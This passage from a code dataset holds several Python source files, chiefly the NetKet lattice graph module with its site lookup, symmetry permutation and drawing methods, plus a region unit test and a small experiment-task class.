\"m\")\n\n self.assertAlmostEqual(expected.x.value, delta.x.value)\n self.assertAlmostEqual(expected.y.value, delta.y.value)\n self.assertEqual(expected.unit, delta.unit)\n\n def testPixels_givesCoordinatesForCenterOfEachPixelOnGrid(self):\n region = PixelRegion(\n dims=Vec2D(3, 3, \"m\"),\n center=Vec2D(2, 2, \"m\"),\n resolution=Vec2D.unitless(3, 3),\n )\n\n actual = region.pixels\n\n expected 
= [\n            [[1, 1], [2, 1], [3, 1]],\n            [[1, 2], [2, 2], [3, 2]],\n            [[1, 3], [2, 3], [3, 3]],\n        ]\n\n        self.assertListEqual(actual.value.tolist(), expected)\n        self.assertEqual(actual.unit, \"m\")\n\n    def testOutline_visualizes(self):\n        region = Region(dims=Vec2D(5, 2, \"arcsec\"), center=Vec2D(7, 8, \"arcsec\"))\n        perim = region.outline.value\n\n    def testSubdivide_perfectSquare_givesRegionAsNonOverlappingSubsets(self):\n        region = PixelRegion(dims=Vec2D(4, 4, \"m\"), resolution=Vec2D.unitless(4, 4))\n        expected_pixels = region.pixels\n        subgrids = region.subdivide(4) # 4 regions of 4 points each\n        self.assertSubregionEqual(subgrids, region)\n\n    def testSubdivide_rectangularSupergridRegion_success(self):\n        region = PixelRegion(dims=Vec2D(4, 4, \"m\"), resolution=Vec2D.unitless(12, 12))\n        expected_pixels = region.pixels\n        subgrids = region.subdivide(6) # split into 6 subgrids\n        self.assertSubregionEqual(subgrids, region)\n\n    def testSubdivide_rectangularRegionAndSupergrid_success(self):\n        region = PixelRegion(dims=Vec2D(4, 4, \"m\"), resolution=Vec2D.unitless(12, 24))\n        expected_pixels = region.pixels\n        subgrids = region.subdivide(6) # split into 6 subgrids\n        self.assertSubregionEqual(subgrids, region)\n\n    def testSubdivide_largeGrid_success(self):\n        region = PixelRegion(dims=Vec2D(4, 4, \"m\"), resolution=Vec2D.unitless(30, 47))\n        expected_pixels = region.pixels\n        subgrids = region.subdivide(20) # split into 20 subgrids\n        self.assertSubregionEqual(subgrids, region)\n\n    def assertSubregionEqual(self, subregions, expected_region):\n        from matplotlib import pyplot as plt\n\n        subregion_coords = []\n        expected_coords = []\n        expected_pixels = expected_region.pixels\n        for s in subregions:\n            pixels = s.pixels\n            for x in range(pixels.shape[0]):\n                for y in range(pixels.shape[1]):\n                    subregion_coords.append(list(pixels[x, y].value))\n\n        for x in range(expected_pixels.shape[0]):\n            for y in range(expected_pixels.shape[1]):\n                expected_coords.append(list(expected_pixels[x, y].value))\n\n        subregion_coords = np.array(subregion_coords)\n        expected_coords = np.array(expected_coords)\n\n        # for region in subregions:\n        #     outline = region.outline\n        #     plt.plot(outline[:, 0], outline[:, 1])\n        # plt.plot(expected_coords[:, 0], expected_coords[:, 1], '.r')\n        # plt.plot(subregion_coords[:, 0], subregion_coords[:, 1], '.b')\n        # plt.show()\n\n        for region in subregions:\n            self.assertAlmostEqual(region.delta.x.value, expected_region.delta.x.value)\n            self.assertAlmostEqual(region.delta.y.value, expected_region.delta.y.value)\n\n        self.assertApproxListEquals(subregion_coords, expected_coords)\n\n    def assertApproxListEquals(self, coords_a, coords_b):\n        self.assertEqual(len(coords_a), len(coords_b))\n        for coord in coords_a:\n            closest_b = self.find_closest_to(coord, coords_b)\n            r = np.sqrt((coord[0] - closest_b[0]) ** 2 + (coord[1] - closest_b[1]) ** 2)\n            # every coordinate in coords_a needs a near-exact match in coords_b\n            found = r < 1e-6\n            if not found:\n                self.assertTrue(False, f\"Could not find equivalent coord to {coord}\")\n\n    def find_closest_to(self, coord, coords):\n        min_dist = 1e6\n        best_found = None\n        for test_coord in coords:\n            r = np.sqrt((test_coord[0] - coord[0]) ** 2 + (test_coord[1] - coord[1]) ** 2)\n            if r < min_dist:\n                min_dist = r\n                best_found = test_coord\n        return best_found\n","sub_path":"test/test_mirage/test_util/test_region.py","file_name":"test_region.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"604321964","text":"# Copyright 2020, 2021 The NetKet Authors -
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom dataclasses import dataclass\nimport itertools\nfrom itertools import product\nfrom math import pi\nfrom netket.utils.types import Array\nfrom typing import Dict, Sequence, Tuple, Union, Optional\nimport warnings\n\nimport networkx as _nx\nimport numpy as _np\nfrom scipy.spatial import cKDTree\nfrom scipy.sparse import find, triu\n\nfrom netket.utils.deprecation import deprecated as _deprecated, warn_deprecation\nfrom netket.utils.semigroup import Identity, Element, PermutationGroup\nfrom netket.utils import HashableArray\n\nfrom .graph import NetworkX\n\ntol_digits = 5\ncutoff_tol = _np.power(10.0, -tol_digits)\n\"\"\"Tolerance for the maximum distance cutoff when computing the sparse distance matrix.\nThis is necessary because of floating-point errors when computing the distance in non-trivial\nlattices.\n\"\"\"\n\nPositionT = _np.ndarray\nCoordT = _np.ndarray\n\n\n@dataclass(frozen=True)\nclass Translation(Element):\n perms: Tuple[Tuple[int]]\n shift: Tuple[int]\n\n def __call__(self, sites):\n for i, dim in enumerate(self.shift):\n perm = self.perms[i]\n for j in range(dim):\n sites = _np.take(sites, perm)\n\n return sites\n\n def __repr__(self):\n return f\"T{self.shift}\"\n\n\n@dataclass(frozen=True)\nclass PlanarRotation(Element):\n perm: Tuple[int]\n num_rots: int\n\n def __call__(self, sites):\n for i in range(self.num_rots):\n sites = _np.take(sites, self.perm)\n\n return sites\n\n def __repr__(self):\n return f\"Rot{self.num_rots}\"\n\n\n@dataclass(frozen=True)\nclass Reflection(Element):\n\n perm: Tuple[int]\n\n def __call__(self, sites):\n sites = _np.take(sites, self.perm)\n\n return sites\n\n def __repr__(self):\n return f\"Ref\"\n\n\ndef get_edges(atoms_positions, cutoff, distance_atol=cutoff_tol):\n cutoff = cutoff + distance_atol\n kdtree = cKDTree(atoms_positions)\n dist_matrix = kdtree.sparse_distance_matrix(kdtree, cutoff)\n id1, id2, values = find(triu(dist_matrix))\n pairs = []\n min_dists = {} # keys are nodes, values are min dists\n for node in _np.unique(_np.concatenate((id1, id2))):\n min_dist = _np.min(values[(id1 == node) | (id2 == node)])\n min_dists[node] = min_dist\n for node in _np.unique(id1):\n min_dist = _np.min(values[id1 == node])\n mask = (id1 == node) & (_np.isclose(values, min_dist))\n first = id1[mask]\n second = id2[mask]\n for pair in zip(first, second):\n if _np.isclose(min_dist, min_dists[pair[0]]) and _np.isclose(\n min_dist, min_dists[pair[1]]\n ):\n pairs.append(pair)\n return pairs\n\n\n@dataclass\nclass LatticeSite:\n \"\"\"\n Contains information about a single :class:`~netket.graph.Lattice` site.\n \"\"\"\n\n id: int\n \"\"\"Integer ID of this site\"\"\"\n position: PositionT\n \"\"\"Real-space position of this site\"\"\"\n cell_coord: CoordT\n \"\"\"basis coordinates of this site\"\"\"\n\n def __repr__(self):\n s = \", \".join(map(str, (self.id, self.cell_coord)))\n return f\"LatticeSite({s})\"\n\n\ndef create_sites(\n basis_vectors, extent, apositions, pbc\n) 
-> Tuple[Tuple[LatticeSite, bool], Dict[HashableArray, int]]:\n shell_vec = _np.zeros(extent.size, dtype=int)\n shift_vec = _np.zeros(extent.size, dtype=int)\n # note: by modifying these, the number of shells can be tuned.\n shell_vec[pbc] = 2\n shift_vec[pbc] = 1\n ranges = tuple([list(range(ex)) for ex in extent + shell_vec])\n sites = []\n cell_coord_to_site = {}\n for s_cell in itertools.product(*ranges):\n s_coord_cell = _np.asarray(s_cell) - shift_vec\n inside = not (_np.any(s_coord_cell < 0) or _np.any(s_coord_cell > (extent - 1)))\n atom_count = len(sites)\n for i, atom_coord in enumerate(apositions):\n s_coord_site = s_coord_cell + atom_coord\n r_coord_site = _np.matmul(basis_vectors.T, s_coord_site)\n cell_coord_site = _np.array((*s_coord_cell, i), dtype=int)\n sites.append(\n (\n LatticeSite(\n id=None, # to be set later, after sorting all sites\n position=r_coord_site,\n cell_coord=cell_coord_site,\n ),\n inside,\n ),\n )\n cell_coord_to_site[HashableArray(cell_coord_site)] = atom_count + i\n return sites, cell_coord_to_site\n\n\ndef get_true_edges(\n basis_vectors: PositionT,\n sites: Sequence[LatticeSite],\n cell_coord_to_site,\n extent,\n distance_atol=cutoff_tol,\n):\n positions = _np.array([p.position for p, _ in sites])\n naive_edges = get_edges(\n positions, _np.linalg.norm(basis_vectors, axis=1).max(), distance_atol\n )\n true_edges = []\n for node1, node2 in naive_edges:\n site1, inside1 = sites[node1]\n site2, inside2 = sites[node2]\n if inside1 and inside2:\n true_edges.append((node1, node2))\n elif inside1 or inside2:\n cell1 = site1.cell_coord\n cell2 = site2.cell_coord\n cell1[:-1] = cell1[:-1] % extent\n cell2[:-1] = cell2[:-1] % extent\n node1 = cell_coord_to_site[HashableArray(cell1)]\n node2 = cell_coord_to_site[HashableArray(cell2)]\n edge = (node1, node2)\n if edge not in true_edges and (node2, node1) not in true_edges:\n true_edges.append(edge)\n return true_edges\n\n\ndef deprecated(alternative):\n def wrapper(fn):\n msg = (\n f\"{fn.__name__} is deprecated and may be removed in the future. \"\n f\"You can use `{alternative}`` instead.\"\n )\n f = _deprecated(msg)(fn)\n return f\n\n return wrapper\n\n\nREPR_TEMPLATE = \"\"\"Lattice(\n n_nodes={},\n extent={},\n basis_vectors=\n {},\n site_offsets=\n {},\n)\n\"\"\"\n\n\nclass Lattice(NetworkX):\n r\"\"\"\n A lattice built by periodic arrangement of a given unit cell.\n\n The lattice is represented as a Bravais lattice with (:code:`basis_vectors`)\n :math:`\\{a_d\\}_{d=1}^D` (where :math:`D = \\mathtt{ndim}` is the dimension of the lattice)\n and a unit cell consisting of one or more sites,\n The positions of those sites within the unit cell can be specified by the :code:`site_offsets`\n parameter. The :code:`extent` is a array where :code:`extent[d]` specifies the number of\n times each unit cell is translated along direction :math:`d`.\n The full lattice is then generated by placing a site at each of the points\n\n .. 
math::\n\n R_{rq} = \\sum_{d=1}^D r_d a_d + b_q \\in \\mathbb R^D\n\n where :math:`r_d \\in \\{1, \\ldots, \\mathtt{extent}[d]\\}` and :math:`b_q = \\mathtt{site\\_offsets}[q]`.\n We also refer to :math:`q` as the `label` of the site within the unit cell.\n\n The lattice class supports three ways of addressing a specific lattice site:\n\n id\n An integer index that is used to identify the site in :code:`self.edges()` and\n also corresponds to the index of the corresponding site in sequences like\n :code:`self.nodes()`, :code:`self.positions` or :code:`self.basis_coords`.\n\n positions\n Real-space position vector :math:`R_{rq}` as defined above, which is available from\n :func:`~netket.graph.Lattice.positions` and can be resolved into an id via\n :func:`~netket.graph.Lattice.id_from_position`.\n\n basis coordinates\n where each site is specified by a vector :code:`[r1, ..., rD, q]`\n with :math:`r` being the integer vector of length :code:`ndim` specifying the\n cell position as multiples of the primitive vectors and the site label :math:`q`\n giving the number of the site within the unit cell.\n Basis coordinates are available from :func:`~netket.graph.Lattice.basis_coords` and\n can be resolved into an id via :func:`~netket.graph.Lattice.id_from_basis_coords`.\n \"\"\"\n # Initialization\n # ------------------------------------------------------------------------\n def __init__(\n self,\n basis_vectors: _np.ndarray,\n extent: _np.ndarray,\n *,\n pbc: Union[bool, Sequence[bool]] = True,\n site_offsets: Optional[_np.ndarray] = None,\n atoms_coord: Optional[_np.ndarray] = None,\n distance_atol: float = 1e-5,\n ):\n \"\"\"\n Constructs a new ``Lattice`` given its side length and the features of the unit cell.\n\n Args:\n basis_vectors: The basis vectors of the lattice. Should be an array\n of shape `(ndim, ndim)` where each `row` is a basis vector.\n extent: The number of copies of the unit cell; needs to be an array\n of length `ndim`.\n pbc: If ``True`` then the constructed lattice\n will have periodic boundary conditions, otherwise\n open boundary conditions are imposed (default=`True`).\n site_offsets: The position offsets of sites in the unit cell (one site at the origin by default).\n distance_atol: Distance below which spatial points are considered equal for the purpose\n of identifying nearest neighbors.\n\n Examples:\n Constructs a Kagome lattice with 3 × 3 unit cells:\n\n >>> import numpy as np\n >>> from netket.graph import Lattice\n >>> # Hexagonal lattice basis\n >>> sqrt3 = np.sqrt(3.0)\n >>> basis = np.array([\n ... [1.0, 0.0],\n ... [0.5, sqrt3 / 2.0],\n ... ])\n >>> # Kagome unit cell\n >>> cell = np.array([\n ... basis[0] / 2.0,\n ... basis[1] / 2.0,\n ... (basis[0]+basis[1])/2.0\n ... ])\n >>> g = Lattice(basis_vectors=basis, site_offsets=cell, extent=[3, 3])\n >>> print(g.n_nodes)\n 27\n >>> print(g.basis_coords[:6])\n [[0 0 0]\n [0 0 1]\n [0 0 2]\n [0 1 0]\n [0 1 1]\n [0 1 2]]\n >>> print(g.positions[:6])\n [[0.5 0. ]\n [0.25 0.4330127 ]\n [0.75 0.4330127 ]\n [1. 
0.8660254 ]\n [0.75 1.29903811]\n [1.25 1.29903811]]\n \"\"\"\n\n self._basis_vectors = self._clean_basis(basis_vectors)\n self._ndim = self._basis_vectors.shape[1]\n\n self._site_offsets, site_pos_fractional = self._clean_site_offsets(\n site_offsets,\n atoms_coord,\n self._basis_vectors,\n )\n self._pbc = self._clean_pbc(pbc, self._ndim)\n\n self._extent = _np.asarray(extent, dtype=int)\n\n sites, self._basis_coord_to_site = create_sites(\n self._basis_vectors, self._extent, site_pos_fractional, pbc\n )\n edges = get_true_edges(\n self._basis_vectors,\n sites,\n self._basis_coord_to_site,\n self._extent,\n distance_atol,\n )\n graph = _nx.MultiGraph(edges)\n\n # Rename sites\n old_nodes = sorted(set(node for edge in edges for node in edge))\n self._sites = []\n for i, (site, _) in enumerate(sites[old_node] for old_node in old_nodes):\n site.id = i\n self._sites.append(site)\n new_nodes = {old_node: new_node for new_node, old_node in enumerate(old_nodes)}\n graph = _nx.relabel_nodes(graph, new_nodes)\n self._basis_coord_to_site = {\n HashableArray(p.cell_coord): p.id for p in self._sites\n }\n self._positions = _np.array([p.position for p in self._sites])\n self._basis_coords = _np.array([p.cell_coord for p in self._sites])\n\n # Order node names\n edges = list(graph.edges())\n graph = _nx.MultiGraph()\n graph.add_nodes_from([p.id for p in self._sites])\n graph.add_edges_from(edges)\n\n lattice_dims = _np.expand_dims(self._extent, 1) * self.basis_vectors\n self._inv_dims = _np.linalg.inv(lattice_dims)\n int_positions = self._to_integer_position(self._positions)\n self._int_position_to_site = {\n HashableArray(pos): index for index, pos in enumerate(int_positions)\n }\n\n super().__init__(graph)\n\n @staticmethod\n def _clean_basis(basis_vectors):\n \"\"\"Check and convert `basis_vectors` init argument.\"\"\"\n basis_vectors = _np.asarray(basis_vectors)\n if basis_vectors.ndim != 2:\n raise ValueError(\n \"'basis_vectors' must have ndim==2 (as array of primtive vectors)\"\n )\n if basis_vectors.shape[0] != basis_vectors.shape[1]:\n raise ValueError(\"The number of primitive vectors must match their length\")\n return basis_vectors\n\n @staticmethod\n def _clean_site_offsets(site_offsets, atoms_coord, basis_vectors):\n \"\"\"Check and convert `site_offsets` init argument.\"\"\"\n if atoms_coord is not None and site_offsets is not None:\n raise ValueError(\n \"atoms_coord is deprecated and replaced by site_offsets, \"\n \"so both cannot be specified at the same time.\"\n )\n if atoms_coord is not None:\n warnings.warn(\n \"atoms_coord is deprecated and may be removed in future versions, \"\n \"please use site_offsets instead\",\n FutureWarning,\n )\n site_offsets = atoms_coord\n\n if site_offsets is None:\n site_offsets = _np.zeros(basis_vectors.shape[0])[None, :]\n\n site_offsets = _np.asarray(site_offsets)\n site_pos_fractional = _np.asarray(\n [\n _np.matmul(_np.linalg.inv(basis_vectors.T), atom_coord)\n for atom_coord in site_offsets\n ]\n )\n if (\n site_pos_fractional.min() < -cutoff_tol\n or site_pos_fractional.max() > 1 + cutoff_tol\n ):\n raise ValueError(\n \"site_offsets positions must be contained inside the primitive cell\"\n )\n uniques = _np.unique(site_offsets, axis=0)\n if len(site_offsets) != uniques.shape[0]:\n site_offsets = _np.asarray(uniques)\n warnings.warn(\n \"Some atom positions are not unique. 
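_clean_site_offsets above converts each site offset into fractional coordinates by solving basis_vectors.T @ frac = offset, then rejects offsets that fall outside the unit cell. A small numerical check of that conversion, reusing the hexagonal basis from the class docstring (values are illustrative):

import numpy as np

basis = np.array([[1.0, 0.0],
                  [0.5, np.sqrt(3.0) / 2.0]])  # hexagonal basis vectors, one per row
offset = (basis[0] + basis[1]) / 2.0           # one of the Kagome site offsets

# Solving basis.T @ frac = offset recovers the fractional coordinates (0.5, 0.5),
# which lie inside the unit cell as the constructor requires.
frac = np.linalg.solve(basis.T, offset)
assert np.allclose(frac, [0.5, 0.5])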
Duplicates were dropped, and \"\n                f\"now atom positions are {site_offsets}\",\n                UserWarning,\n            )\n        return site_offsets, site_pos_fractional\n\n    @staticmethod\n    def _clean_pbc(pbc, ndim):\n        \"\"\"Check and convert `pbc` init argument.\"\"\"\n        if isinstance(pbc, bool):\n            return _np.array([pbc] * ndim, dtype=bool)\n        elif (\n            not isinstance(pbc, Sequence)\n            or len(pbc) != ndim\n            or not all(isinstance(b, bool) for b in pbc)\n        ):\n            raise ValueError(\n                \"pbc must be either a boolean or a sequence of booleans with length equal to \"\n                \"the lattice dimension\"\n            )\n        else:\n            return _np.asarray(pbc, dtype=bool)\n\n    # Properties\n    # ------------------------------------------------------------------------\n    @property\n    def basis_vectors(self):\n        \"\"\"Basis vectors of the lattice\"\"\"\n        return self._basis_vectors\n\n    @property\n    def site_offsets(self):\n        \"\"\"Position offsets of sites in the unit cell\"\"\"\n        return self._site_offsets\n\n    @property\n    def ndim(self):\n        \"\"\"Dimension of the lattice\"\"\"\n        return self._ndim\n\n    @property\n    def pbc(self):\n        \"\"\"\n        Array of bools such that `pbc[d]` indicates whether dimension d has\n        periodic boundaries.\n        \"\"\"\n        return self._pbc\n\n    @property\n    def extent(self):\n        \"\"\"\n        Extent of the lattice\n        \"\"\"\n        return self._extent\n\n    @property\n    def sites(self) -> Sequence[LatticeSite]:\n        \"\"\"Sequence of lattice site objects\"\"\"\n        return self._sites\n\n    @property\n    def positions(self) -> PositionT:\n        \"\"\"Real-space positions of all lattice sites\"\"\"\n        return self._positions\n\n    @property\n    def basis_coords(self) -> CoordT:\n        \"\"\"basis coordinates of all lattice sites\"\"\"\n        return self._basis_coords\n\n    # Site lookup\n    # ------------------------------------------------------------------------\n    def _to_integer_position(self, positions: PositionT) -> Array:\n        frac_positions = _np.matmul(positions, self._inv_dims) % 1\n        return _np.around(frac_positions * 10 ** tol_digits).astype(int) % (\n            10 ** tol_digits\n        )\n\n    @staticmethod\n    def _get_id_from_dict(\n        dict: Dict[HashableArray, int], key: Array\n    ) -> Union[int, Array]:\n        if key.ndim == 1:\n            return dict.get(HashableArray(key), None)\n        elif key.ndim == 2:\n            return _np.array([dict.get(HashableArray(k), None) for k in key])\n        else:\n            raise ValueError(\"Input needs to be rank 1 or rank 2 array\")\n\n    def id_from_position(self, position: PositionT) -> Union[int, Array]:\n        \"\"\"\n        Return the id for a site at the given position. When passed a rank-2 array\n        where each row is a position, this method returns an array of the corresponding ids.\n        In both cases, None is returned for positions that do not correspond to a site.\n        \"\"\"\n        int_pos = self._to_integer_position(position)\n        return self._get_id_from_dict(self._int_position_to_site, int_pos)\n\n    def id_from_basis_coords(self, basis_coords: CoordT) -> Union[int, Array]:\n        \"\"\"\n        Return the id for a site at the given basis coordinates. When passed a rank-2 array\n        where each row is a coordinate vector, this method returns an array of the corresponding\n        ids.
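_to_integer_position above makes float positions usable as dictionary keys: it wraps each position into fractional coordinates of the lattice box, then rounds to tol_digits so floating-point noise cannot split equal positions into distinct keys. A standalone sketch of the same trick (inv here is an illustrative inverse of a 4x4 box):

import numpy as np

TOL_DIGITS = 5

def to_integer_position(positions, inv_dims):
    # Fractional coordinates in [0, 1), rounded onto a fixed grid of 10**TOL_DIGITS bins.
    frac = np.matmul(positions, inv_dims) % 1
    return np.around(frac * 10 ** TOL_DIGITS).astype(int) % (10 ** TOL_DIGITS)

# Two positions differing by ~1e-9 land on the same integer key:
inv = np.eye(2) / 4.0
a = to_integer_position(np.array([[1.0, 2.0]]), inv)
b = to_integer_position(np.array([[1.0 + 1e-9, 2.0]]), inv)
assert (a == b).all()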
In both cases, None is returned for coords that do not correspond to a site.\n        \"\"\"\n        key = _np.asarray(basis_coords)\n        return self._get_id_from_dict(self._basis_coord_to_site, key)\n\n    def position_from_basis_coords(self, basis_coords: CoordT) -> PositionT:\n        \"\"\"\n        Return the position of the site with given basis coordinates.\n        When passed a rank-2 array where each row is a coordinate vector,\n        this method returns an array of the corresponding positions.\n        Throws a KeyError if no site is found for any of the coordinates.\n        \"\"\"\n        ids = self.id_from_basis_coords(basis_coords)\n        if _np.any(ids == None): # pylint: disable=singleton-comparison\n            raise KeyError(f\"No site found at at least one of {basis_coords}\")\n        return self.positions[ids]\n\n    # Output and drawing\n    # ------------------------------------------------------------------------\n    def __repr__(self) -> str:\n        return REPR_TEMPLATE.format(\n            self.n_nodes,\n            self._extent,\n            str(self.basis_vectors).replace(\"\\n\", \"\\n\" + \" \" * 8),\n            str(self.site_offsets).replace(\"\\n\", \"\\n\" + \" \" * 8),\n        )\n\n    def draw(\n        self,\n        ax=None,\n        figsize: Optional[Tuple[Union[int, float]]] = None,\n        node_color: str = \"#1f78b4\",\n        node_size: int = 300,\n        edge_color: str = \"k\",\n        curvature: float = 0.2,\n        font_size: int = 12,\n        font_color: str = \"k\",\n    ):\n        \"\"\"\n        Draws the ``Lattice`` graph\n\n        Args:\n            ax: Matplotlib axis object.\n            figsize: (width, height) tuple of the generated figure.\n            node_color: String with the colour of the nodes.\n            node_size: Area of the nodes (as in matplotlib.pyplot.scatter).\n            edge_color: String with the colour of the edges.\n            curvature: A Bezier curve is fit, where the \"height\" of the curve is `curvature`\n                times the \"length\" of the curvature.\n            font_size: fontsize of the labels for each node.\n            font_color: Colour of the font used to label nodes.\n\n        Returns:\n            Matplotlib axis object containing the graph's drawing.\n        \"\"\"\n        import matplotlib.pyplot as plt # pylint: disable=import-outside-toplevel\n\n        # Check if lattice is 1D or 2D... or not\n        if self._ndim == 1:\n            positions = _np.pad(self.positions, (0, 1), \"constant\")\n        elif self._ndim == 2:\n            positions = self.positions\n        else:\n            raise ValueError(\n                f\"Make sure that the graph is 1D or 2D in order to be drawn.
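The lookup methods defined above compose into a round trip between the three addressing schemes the class supports. A usage sketch built on the 3 x 3 Kagome lattice from the class docstring (assuming the module is importable as netket.graph):

import numpy as np
from netket.graph import Lattice

sqrt3 = np.sqrt(3.0)
basis = np.array([[1.0, 0.0], [0.5, sqrt3 / 2.0]])
cell = np.array([basis[0] / 2.0, basis[1] / 2.0, (basis[0] + basis[1]) / 2.0])
g = Lattice(basis_vectors=basis, site_offsets=cell, extent=[3, 3])

# basis coords -> real-space position -> id recovers the same site.
pos = g.position_from_basis_coords([0, 0, 2])
assert g.id_from_position(pos) == g.id_from_basis_coords([0, 0, 2])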
Now it is {self._ndim}D\"\n )\n if ax is None:\n _, ax = plt.subplots(figsize=figsize)\n\n # FIXME (future) as of 11Apr2021, networkx can draw curved\n # edges only for directed graphs.\n _nx.draw_networkx_edges(\n self.graph.to_directed(),\n pos=positions,\n edgelist=self.edges(),\n connectionstyle=f\"arc3,rad={curvature}\",\n ax=ax,\n arrowsize=0.1,\n edge_color=edge_color,\n node_size=node_size,\n )\n _nx.draw_networkx_nodes(\n self.graph, pos=positions, ax=ax, node_color=node_color, node_size=node_size\n )\n _nx.draw_networkx_labels(\n self.graph, pos=positions, ax=ax, font_size=font_size, font_color=font_color\n )\n ax.axis(\"equal\")\n return ax\n\n # Backwards compatibility\n # ------------------------------------------------------------------------\n @deprecated(\"basis_coords[site_id, -1]\")\n def atom_label(self, site_id: int) -> int:\n \"\"\"`Deprecated`, please use :code:`basis_coords[site_id, -1]` instead.\"\"\"\n return self.basis_coords[site_id, -1]\n\n @deprecated(\"basis_coords[site_id, :-1]\")\n def site_to_vector(self, site_id: int) -> CoordT:\n \"\"\"`Deprecated`, please use :code:`basis_coords[site_id, :-1]` instead.\"\"\"\n return self.basis_coords[site_id, :-1]\n\n @deprecated(\"positions[site_id]\")\n def site_to_coord(self, site_id: int) -> PositionT:\n \"\"\"`Deprecated`, please use :code:`positions[site_id]` instead.\"\"\"\n return self.positions[site_id]\n\n @deprecated(\"id_from_basis_coords([*vector, 0])\")\n def vector_to_site(self, vector: CoordT) -> int:\n \"\"\"`Deprecated`, please use :code:`id_from_basis_coords([*vector, 0])` instead.\"\"\"\n # Note: This only gives one site within the unit cell, so that\n # `vector_to_site(site_to_vector(i)) == i` is _not_ true in general,\n # which is consistent with the behavior of the v2 lattice.\n return self.id_from_basis_coords([*vector, 0])\n\n @deprecated(\"position_from_basis_coords([*vector, label])\")\n def vector_to_coord(self, vector: CoordT, label: int) -> PositionT:\n \"\"\"`Deprecated`, please use :code:`position_from_basis_coords([*vector, label])` instead.\"\"\"\n return self.position_from_basis_coords([*vector, label])\n\n @property\n @deprecated(\"positions\")\n def coordinates(self) -> PositionT:\n \"\"\"`Deprecated`, please use :code:`positions` instead.\"\"\"\n return self.positions\n\n @property\n @deprecated(\"site_offsets\")\n def atoms_coord(self) -> PositionT:\n \"\"\"`Deprecated`, please use :code:`site_offsets` instead.\"\"\"\n return self._site_offsets\n\n # Symmetries\n # ------------------------------------------------------------------------\n def _get_id_or_raise(self, pos: PositionT) -> Union[int, Array]:\n ids = self.id_from_position(pos)\n if _np.any(ids == None): # pylint: disable=singleton-comparison\n raise KeyError(f\"No site found at at least one of {pos}\")\n return ids\n\n def translation_perm(self):\n perms = []\n for vec in self.basis_vectors:\n perm = []\n for position in self._positions:\n position = position.copy() + vec\n perm.append(self._get_id_or_raise(position))\n\n perms.append(tuple(perm))\n return tuple(perms)\n\n def rotation_perm(self, period, axes=[0, 1]):\n perm = []\n axes = list(axes)\n angle = 2 * pi / period\n rot_mat = _np.array(\n [[_np.cos(angle), -_np.sin(angle)], [_np.sin(angle), _np.cos(angle)]]\n )\n\n rpositions = self._positions.copy()\n rpositions[:, axes] = _np.matmul(rpositions[:, axes], rot_mat)\n\n for position in rpositions:\n try:\n perm.append(self._get_id_or_raise(position))\n except KeyError as e:\n raise ValueError(\n \"Rotation with 
the specified period and axes does not map lattice to itself\"\n ) from e\n\n return tuple(perm)\n\n def reflection_perm(self, axis=0):\n perm = []\n rpositions = self._positions.copy()\n rpositions[:, axis] = -1 * rpositions[:, axis]\n\n for position in rpositions:\n try:\n perm.append(self._get_id_or_raise(position))\n except KeyError as e:\n raise ValueError(\n \"Reflection about specified axis does not map lattice to itself\"\n ) from e\n\n return tuple(perm)\n\n def planar_rotations(self, period, axes=[0, 1]) -> PermutationGroup:\n \"\"\"\n Returns PermutationGroup corresponding to rotations about specfied axes with specified period\n\n Arguments:\n period: Period of the rotations\n axes: Axes that define the plane of the rotation\n \"\"\"\n\n perm = self.rotation_perm(period, axes)\n rotations = [PlanarRotation(perm, n) for n in range(1, period)]\n\n return PermutationGroup([Identity()] + rotations, degree=self.n_nodes)\n\n def basis_translations(self) -> PermutationGroup:\n \"\"\"\n Returns PermutationGroup corresponding to translations by site_offsets vectors\n \"\"\"\n\n translations = product(*[range(i) for i in self._extent])\n next(translations)\n\n perms = self.translation_perm()\n translations = [Translation(perms, i) for i in translations]\n\n return PermutationGroup([Identity()] + translations, degree=self.n_nodes)\n\n def reflections(self, axis=0) -> PermutationGroup:\n \"\"\"\n Returns PermutationGroup corresponding to reflection about axis\n args:\n axis: Generated reflections about specified axis\n \"\"\"\n perm = self.reflection_perm(axis)\n\n return PermutationGroup([Identity()] + [Reflection(perm)], degree=self.n_nodes)\n","sub_path":"netket/graph/lattice.py","file_name":"lattice.py","file_ext":"py","file_size_in_byte":27066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376395600","text":"class ExperimentSummaryTask:\n def __init__(self, assemble_config, learn_config, created_ts):\n self.assemble_config = assemble_config\n self.learn_config = learn_config\n self.created_ts = created_ts\n self.assemble_result = None\n self.learn_result = None\n\n @classmethod\n def from_es_data(cls, task):\n res = cls(\n assemble_config=task['assemble_config'],\n learn_config=task['learn_config'],\n created_ts=task['created_ts'],\n )\n res.assemble_result = task['assemble_result']\n res.learn_result = task['learn_result']\n return res\n\n def add_assemble_result(self, result_file_path):\n if result_file_path:\n self.assemble_result = result_file_path\n\n return {\n \"assemble_result\": self.assemble_result\n }\n\n def add_learn_result(self, result):\n if result:\n self.learn_result = result\n\n return {\n \"learn_result\": self.learn_result\n }\n","sub_path":"DWF-server/model/experiment_summary_task.py","file_name":"experiment_summary_task.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"439962392","text":"# Copyright 2017 The UAI-SDK Authors. 
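ExperimentSummaryTask above is a plain holder for task state: each add_* method stores a result only when it is truthy and always returns the partial document used for the follow-up Elasticsearch update. A short usage sketch (the config dicts and path are illustrative):

import time

task = ExperimentSummaryTask(
    assemble_config={"dataset": "example"},
    learn_config={"algorithm": "forest"},
    created_ts=int(time.time()),
)

# A truthy result is stored and echoed back as the update document.
assert task.add_assemble_result("/tmp/assembled.csv") == {"assemble_result": "/tmp/assembled.csv"}
# A falsy result leaves the stored value (still None) untouched.
assert task.add_learn_result(None) == {"learn_result": None}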
